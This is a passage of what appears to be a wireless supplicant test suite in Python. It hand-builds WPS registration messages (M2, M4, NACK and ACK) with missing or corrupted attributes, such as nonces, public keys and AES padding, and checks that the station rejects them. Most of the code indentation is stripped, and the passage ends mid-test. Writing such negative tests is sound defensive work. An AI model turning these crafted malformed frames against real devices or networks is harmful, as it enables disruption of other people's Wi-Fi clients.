def test_wps_ext_cred_proto_network_key_missing_open(dev, apdev):
"""WPS and Credential: Network Key missing (open)"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, auth_type='\x00\x01',
encr_type='\x00\x01', nw_key=None, ssid="foo")
wps_run_cred_proto(dev, apdev, m8_cred, no_connect=True)
def test_wps_ext_cred_proto_mac_addr_missing(dev, apdev):
"""WPS and Credential: MAC Address missing"""
m8_cred = build_cred(mac_addr=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_invalid_encr_type(dev, apdev):
"""WPS and Credential: Invalid Encr Type"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, encr_type='\x00\x00')
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_missing_cred(dev, apdev):
"""WPS and Credential: Missing Credential"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = b''
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_proto_m2_no_public_key(dev, apdev):
"""WPS and no Public Key in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, None)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m2_invalid_public_key(dev, apdev):
"""WPS and invalid Public Key in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, 192*b'\xff')
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m2_public_key_oom(dev, apdev):
"""WPS and Public Key OOM in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
with alloc_fail(dev[0], 1, "wpabuf_alloc_copy;wps_process_pubkey"):
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_nack_m3(dev, apdev):
"""WPS and NACK M3"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, config_error='\x01\x23')
send_wsc_msg(dev[0], bssid, msg)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("Failure not reported")
if "msg=7 config_error=291" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_wps_ext_proto_nack_m5(dev, apdev):
"""WPS and NACK M5"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, config_error='\x01\x24')
send_wsc_msg(dev[0], bssid, msg)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("Failure not reported")
if "msg=9 config_error=292" not in ev:
raise Exception("Unexpected failure reason: " + ev)
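# Helper: drive the exchange up to receiving M3 from the STA and return the
# values needed to build crafted ACK/NACK messages.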
def wps_nack_m3(dev, apdev):
pin = "00000000"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk, dev_pw_id='\x00\x04')
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid
def test_wps_ext_proto_nack_m3_no_config_error(dev, apdev):
"""WPS and NACK M3 missing Config Error"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, config_error=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_e_nonce(dev, apdev):
"""WPS and NACK M3 missing E-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, None, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_e_nonce_mismatch(dev, apdev):
"""WPS and NACK M3 E-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, 16*'\x00', r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_r_nonce(dev, apdev):
"""WPS and NACK M3 missing R-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_r_nonce_mismatch(dev, apdev):
"""WPS and NACK M3 R-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, 16*'\x00')
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_msg_type(dev, apdev):
"""WPS and NACK M3 no Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, msg_type=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_invalid_msg_type(dev, apdev):
"""WPS and NACK M3 invalid Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, msg_type=123)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_invalid_attr(dev, apdev):
"""WPS and NACK M3 invalid attribute"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
attrs = b'\x10\x10\x00'
msg = build_eap_wsc(1, eap_id, attrs, opcode=WSC_NACK)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_e_nonce(dev, apdev):
"""WPS and ACK M3 missing E-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
    msg, attrs = build_ack(eap_id, None, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_e_nonce_mismatch(dev, apdev):
"""WPS and ACK M3 E-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
    msg, attrs = build_ack(eap_id, 16*b'\x00', r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_r_nonce(dev, apdev):
"""WPS and ACK M3 missing R-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_r_nonce_mismatch(dev, apdev):
"""WPS and ACK M3 R-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
    msg, attrs = build_ack(eap_id, e_nonce, 16*b'\x00')
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_msg_type(dev, apdev):
"""WPS and ACK M3 no Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce, msg_type=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_invalid_msg_type(dev, apdev):
"""WPS and ACK M3 invalid Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
    logger.debug("Send ACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce, msg_type=123)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_invalid_attr(dev, apdev):
"""WPS and ACK M3 invalid attribute"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send ACK to STA")
attrs = b'\x10\x10\x00'
msg = build_eap_wsc(1, eap_id, attrs, opcode=WSC_ACK)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3(dev, apdev):
"""WPS and ACK M3"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send ACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
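# wps_to_m3_helper() runs a PIN-based exchange through M3 and returns the
# negotiated state (nonces, hashes, secret nonces, keys) needed to build
# valid or deliberately malformed M4/M6/M8 messages in later tests.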
def wps_to_m3_helper(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
return eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey
def wps_to_m3(dev, apdev):
eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey = wps_to_m3_helper(dev, apdev)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid, r_hash1, r_hash2, r_s1, raw_m3_attrs, authkey, keywrapkey
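# wps_to_m5() continues from M3 by sending a valid M4 and stops once the
# station has responded with M5, so callers can tamper with M6 and beyond.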
def wps_to_m5(dev, apdev):
eap_id, m1_attrs, r_nonce, bssid, r_hash1, r_hash2, r_s1, r_s2, raw_m3_attrs, authkey, keywrapkey = wps_to_m3_helper(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid, r_hash1, r_hash2, r_s2, raw_m5_attrs, authkey, keywrapkey
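# Each of the following tests omits or corrupts a single attribute in a
# registrar message and expects the station to reply with WSC_NACK.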
def test_wps_ext_proto_m4_missing_r_hash1(dev, apdev):
"""WPS and no R-Hash1 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_missing_r_hash2(dev, apdev):
"""WPS and no R-Hash2 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
#attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_missing_r_snonce1(dev, apdev):
"""WPS and no R-SNonce1 in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
#data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_invalid_pad_string(dev, apdev):
"""WPS and invalid pad string in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
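    # Hand-build the Encrypted Settings attribute so the PKCS#7-style padding
    # can be corrupted: every pad byte should equal pad_len, but the final
    # byte is set to pad_len - 1 below.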
pad_len = 16 - len(data) % 16
ps = (pad_len - 1) * struct.pack('B', pad_len) + struct.pack('B', pad_len - 1)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_invalid_pad_value(dev, apdev):
"""WPS and invalid pad value in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
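    # Same hand-built Encrypted Settings, but the final pad byte is 255,
    # outside the valid 1..16 range for a 16-octet AES block.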
pad_len = 16 - len(data) % 16
ps = (pad_len - 1) * struct.pack('B', pad_len) + struct.pack('B', 255)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m4_no_encr_settings(dev, apdev):
"""WPS and no Encr Settings in M4"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s1, m3, authkey, keywrapkey = wps_to_m3(dev, apdev)
logger.debug("Send M4 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
